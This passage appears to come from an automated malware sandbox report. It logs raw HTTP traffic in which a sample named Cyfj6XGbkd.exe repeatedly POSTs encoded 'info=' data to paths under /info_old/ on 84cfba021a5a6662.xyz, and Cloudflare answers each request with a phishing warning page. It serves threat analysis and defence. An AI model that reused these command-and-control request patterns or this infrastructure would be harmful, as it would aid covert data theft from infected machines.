                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 81
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
                                                                                                                                                    Jan 29, 2021 17:36:38.555078983 CET116OUTData Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 66 78 4e 35 6f 4e 75 36 76 6c 79 6e 59 4c 33 50 36 4d 6f 6b 5f 77 7e
                                                                                                                                                    Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVfxN5oNu6vlynYL3P6Mok_w~
                                                                                                                                                    Jan 29, 2021 17:36:38.608758926 CET118INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:38 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=df39acf80abb8bafc346aa9eed4bd05c41611938198; expires=Sun, 28-Feb-21 16:36:38 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a0c3f00004c7a989ee000000001
                                                                                                                                                    Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=DNXVjPu5uwOmj99TlOOlAhMHoU%2F5YEqSEKFA8SUaJnYFWZXV0KUhm8zsKTx5eNn0ZKjJppKl8FGwSslOHQla1m%2BkGiweMsOpYugdajbxJfYjsXN%2FOg%3D%3D"}]}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945f8d3fd04c7a-AMS
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport
                                                                                                                                                    Jan 29, 2021 17:36:38.608782053 CET119INData Raw: 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 69 64 3d 22 63 66 5f 73 74
                                                                                                                                                    Data Ascii: " content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/
                                                                                                                                                    Jan 29, 2021 17:36:38.609302998 CET121INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 68 61 74 20 69 73 20 70 68 69 73 68 69 6e 67 3f 3c 2f 68 32 3e 0a 0a 20 20 20 20 20 20 20
                                                                                                                                                    Data Ascii: <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to
                                                                                                                                                    Jan 29, 2021 17:36:40.871623993 CET149OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 81
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
                                                                                                                                                    Jan 29, 2021 17:36:40.871685028 CET149OUTData Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 61 54 4d 71 79 52 4d 68 73 6f 6e 31 65 67 6a 71 6c 6f 6c 4a 54 6b 7e
                                                                                                                                                    Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVaTMqyRMhson1egjqlolJTk~
                                                                                                                                                    Jan 29, 2021 17:36:40.932384968 CET150INHTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:40 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=d62a03f41afb9e90cff91933b2a7bb33a1611938200; expires=Sun, 28-Feb-21 16:36:40 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a154f00004c7ae8157000000001
                                                                                                                                                    Report-To: {"max_age":604800,"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=cuqf45jSp%2Bm%2F3k0sv4SqMBJcKL7rdKkeo73x6od7TLqTgJ2Xnh4uuFmcj8wx7JbDVqLdNq%2Bs8VpaHSE7CEV5Yw8A77L2yb0UxxYccLy5T1q4VLIPgQ%3D%3D"}]}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945f9bbcda4c7a-AMS
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.6 | 49729 | 104.21.23.16 | 80 | C:\Users\user\Desktop\Cyfj6XGbkd.exe
Timestamp | kBytes transferred | Direction | Data
Jan 29, 2021 17:36:46.603761911 CET | 168 | OUT | POST /info_old/w HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 81
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:36:46.603826046 CET | 168 | OUT |
                                                                                                                                                    Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVZqAl7oAGkIIrghjWX3IqLM~
Jan 29, 2021 17:36:46.695880890 CET | 170 | IN | HTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:46 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=d24bdaf5c7addfa487e548b267849589e1611938206; expires=Sun, 28-Feb-21 16:36:46 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a2bb10000c7714b022000000001
                                                                                                                                                    Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=3WbUPNX0Q33l2fVJSYmLl0c0RPUwHvKFKwstASSbw4zStXrHdk7pR3qp9oXUJqZaHDIplqJGYjfYpfH3VAWB6bDXWgOVgqa6bDpzhIhib1vgGJngsw%3D%3D"}],"group":"cf-nel"}
                                                                                                                                                    NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945fbf8d11c771-AMS
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" cont
Jan 29, 2021 17:36:46.696003914 CET | 171 | IN |
                                                                                                                                                    Data Ascii: ent="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cg
Jan 29, 2021 17:36:46.696084023 CET | 173 | IN |
                                                                                                                                                    Data Ascii: <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a
Jan 29, 2021 17:36:46.696126938 CET | 174 | IN |
                                                                                                                                                    Data Ascii: </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span
Jan 29, 2021 17:36:46.696902990 CET | 174 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0
Jan 29, 2021 17:36:49.255383968 CET | 181 | OUT | POST /info_old/w HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 81
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:36:49.255412102 CET | 181 | OUT |
                                                                                                                                                    Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVTvPnLq0jSbJdA3Ui7fMyr8~
Jan 29, 2021 17:36:49.311367989 CET | 183 | IN | HTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:49 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=dfd1543d618807c76cb51baef504b58491611938209; expires=Sun, 28-Feb-21 16:36:49 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a360d0000c7713abc2000000001
                                                                                                                                                    Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=kDBDa3O4gcjQHx7SddhRGwqhUKmFKuFOCZV61Ca41y3J0daL4CBfi4qULaTcPjYCuwV2Y0FH1mkanoF7BwVd4f1yEU6ywTAC872iBXOU5fJcKuDluw%3D%3D"}],"group":"cf-nel"}
                                                                                                                                                    NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945fd01c9bc771-AMS
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" cont
Jan 29, 2021 17:36:49.311407089 CET | 184 | IN |
                                                                                                                                                    Data Ascii: ent="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cg
Jan 29, 2021 17:36:49.311429977 CET | 185 | IN |
                                                                                                                                                    Data Ascii: <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be a
Jan 29, 2021 17:36:49.311451912 CET | 186 | IN |
                                                                                                                                                    Data Ascii: </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span
Jan 29, 2021 17:36:49.311466932 CET | 186 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.6 | 49730 | 104.21.23.16 | 80 | C:\Users\user\Desktop\Cyfj6XGbkd.exe
Timestamp | kBytes transferred | Direction | Data
Jan 29, 2021 17:36:46.738434076 CET | 175 | OUT | POST /info_old/w HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 81
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:36:46.738558054 CET | 175 | OUT |
                                                                                                                                                    Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVUd2DBPCB7ADDo3WU6UPgg8~
Jan 29, 2021 17:36:46.807162046 CET | 176 | IN | HTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:46 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=d44c674e9b268f9729bc63b270c11e6fb1611938206; expires=Sun, 28-Feb-21 16:36:46 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a2c360000fa887a3a9000000001
                                                                                                                                                    Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=bgeVqZANOyLARbubF49VtUP%2BZDvlFHU2EXWwvnYQLx41IuECCf6Iv3nEhozobRthbuUQtu8HTzOt4czKuTC7xmyu3fCffsHgriO5TJhL669K9MECjQ%3D%3D"}]}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945fc05ce6fa88-AMS
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" co
Jan 29, 2021 17:36:46.807198048 CET 178 IN
                                                                                                                                                    Data Ascii: ntent="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-
Jan 29, 2021 17:36:46.807224989 CET 179 IN
                                                                                                                                                    Data Ascii: <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to be
Jan 29, 2021 17:36:46.807250023 CET 180 IN
                                                                                                                                                    Data Ascii: > </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <sp
Jan 29, 2021 17:36:46.807271957 CET 180 IN Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0
Jan 29, 2021 17:36:55.304384947 CET 187 OUT POST /info_old/e HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 677
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:36:55.304445028 CET 188 OUT
                                                                                                                                                    Data Ascii: info=WySAnbXjWTW8YGXUGcJV9XQKqvXCI1AmWDBJj4U-g1WKRvnxTscwduFT2BfCXgg0h7Sxqatla3ng8ukL-pl8Dr8N8HqDpScYTbUy6uw5ZL-MPhpTNUsvoyOqifmBCVQiT6Y7NpBzPsi912F8WNCFScT8b-uWJRUCEPgr_QY2cinQd9sNw2c_3TQDzSqhX4WKYPwaiFyLCUTMojROHTa1EECTRm3aGKyWGwr5K8DJV4r30i
Jan 29, 2021 17:36:55.358536005 CET 190 IN HTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:55 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=debc2c1474dd88953f1663041caeface91611938215; expires=Sun, 28-Feb-21 16:36:55 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a4daf0000fa8808379000000001
                                                                                                                                                    Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=DszwcFU1azWQLn01RElxOwnV2O2Ueli9QIC2IbMyKMQVDlZD5IjdcVbfh5UvCbSQdvehZMIYHKVW8KDBGHU1n7v6nJ75mb0b7%2Bh73mH%2B0VSgQPaReA%3D%3D"}]}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945ff5ecddfa88-AMS
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport"
Jan 29, 2021 17:36:55.358561039 CET 191 IN
                                                                                                                                                    Data Ascii: content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cd
Jan 29, 2021 17:36:55.358577013 CET 192 IN
                                                                                                                                                    Data Ascii: <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to b
Jan 29, 2021 17:36:55.358596087 CET 193 IN
                                                                                                                                                    Data Ascii: iv> </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <
Jan 29, 2021 17:36:55.358608961 CET 193 IN Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                    Data Ascii: 0
Jan 29, 2021 17:36:55.381866932 CET 194 OUT POST /info_old/w HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 81
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:36:55.382005930 CET 194 OUT
                                                                                                                                                    Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVYxyRt0-Ufg1U9INIMC9p9w~
Jan 29, 2021 17:36:55.432903051 CET 196 IN HTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:55 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Set-Cookie: __cfduid=debc2c1474dd88953f1663041caeface91611938215; expires=Sun, 28-Feb-21 16:36:55 GMT; path=/; domain=.84cfba021a5a6662.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    cf-request-id: 07f09a4dfa0000fa8830063000000001
                                                                                                                                                    Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=D9fwJOS8pZebGFQq7B6FJLaQ%2FmcNDipyadybgDD7L1SKN97VSbKQsHKdxwBNnl3D2%2FOx1sH34jEiZYb1VtlFnHKk09yuid%2F54wWWzO9I6f6a3y5cJQ%3D%3D"}]}
                                                                                                                                                    NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 61945ff65de5fa88-AMS
                                                                                                                                                    Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport
Jan 29, 2021 17:36:55.432929039 CET 197 IN
                                                                                                                                                    Data Ascii: " content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,projection" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/
Jan 29, 2021 17:36:55.433439970 CET 199 IN
                                                                                                                                                    Data Ascii: <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquire personal information such as passwords and credit card details by pretending to
Jan 29, 2021 17:36:56.186005116 CET 223 OUT POST /info_old/g HTTP/1.1
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Pragma: no-cache
                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                    Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                    upgrade-insecure-requests: 1
                                                                                                                                                    Content-Length: 1393
                                                                                                                                                    Host: 84cfba021a5a6662.xyz
Jan 29, 2021 17:36:56.186244011 CET 224 OUT
                                                                                                                                                    Data Ascii: info=WySAnbXjWTW8YGXUGcJV9XQKqvXCI1AmWDBJj4U-g1WKRvnxTscwduFT2BfCXgg0h7Sxqatla3ng8ukL-pl8Dr8N8HqDpScYTbUy6uw5ZL9dPu8tHcojNoSU10abrQpDeo-iZUd0ZAP3qOZLIQKMvflWIEmwltfDdeu99jzqugL6T_r7fxFSb4rHJERaX4_jyMdhhc_PlkBCrZmVaMIUFD-4W15kLI477nYNSGFdl2ogM8
Jan 29, 2021 17:36:56.243818045 CET 225 IN HTTP/1.1 200 OK
                                                                                                                                                    Date: Fri, 29 Jan 2021 16:36:56 GMT
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                    Connection: keep-alive
